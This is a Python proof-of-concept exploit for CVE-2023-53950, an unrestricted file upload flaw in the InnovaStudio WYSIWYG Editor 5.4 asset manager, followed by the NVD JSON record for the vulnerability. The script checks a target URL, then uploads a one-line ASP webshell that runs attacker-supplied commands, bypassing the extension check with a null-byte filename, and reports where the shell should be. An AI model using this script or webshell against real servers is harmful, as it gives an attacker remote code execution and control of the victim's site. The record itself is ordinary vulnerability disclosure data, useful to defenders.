CVE-2023-53950

#!/usr/bin/env python3 # CVE-2023-53950 PoC - InnovaStudio WYSIWYG Editor Unrestricted File Upload # Target: InnovaStudio WYSIWYG Editor 5.4 Asset Manager import requests import sys def upload_webshell(target_url, webshell_content): """ Upload malicious ASP webshell via filename manipulation """ # Target the asset manager upload endpoint upload_url = f"{target_url}/assetmanager/assetmanager.aspx" # Method 1: Null byte injection to bypass extension check # The null byte (%00) tricks the server into processing the file as .asp files = { 'file': ('shell.aspx%00.jpg', webshell_content, 'image/jpeg') } data = { 'folder': '/uploads/' } try: print(f"[*] Attempting to upload webshell to {target_url}") print(f"[*] Using null byte injection technique...") response = requests.post(upload_url, files=files, data=data, timeout=30) if response.status_code == 200: print("[+] File upload request sent successfully") # The actual webshell path would be: /uploads/shell.aspx webshell_path = f"{target_url}/uploads/shell.aspx" print(f"[+] Webshell should be available at: {webshell_path}") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def check_vulnerability(target_url): """ Check if target is vulnerable """ test_url = f"{target_url}/assetmanager/assetmanager.aspx" try: response = requests.get(test_url, timeout=10) if response.status_code == 200: print(f"[+] Target appears to be running InnovaStudio Asset Manager") return True except: pass return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2023-53950-poc.py <target_url>") print("Example: python cve-2023-53950-poc.py http://target.com/editor") sys.exit(1) target = sys.argv[1].rstrip('/') # ASP webshell content webshell = '''<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>''' if check_vulnerability(target): upload_webshell(target, webshell) else: print("[-] Target does not appear to be vulnerable or is not reachable")

{"cve": {"id": "CVE-2023-53950", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:51.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "InnovaStudio WYSIWYG Editor 5.4 contains an unrestricted file upload vulnerability that allows attackers to bypass file extension restrictions through filename manipulation. Attackers can upload malicious ASP shells by using null byte techniques and alternate file extensions to circumvent upload controls in the asset manager."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://innovastudio.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51362", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/innovastudio-wysiwyg-editor-unrestricted-file-upload-via-filename-manipulation", "source": "[email protected]"}]}}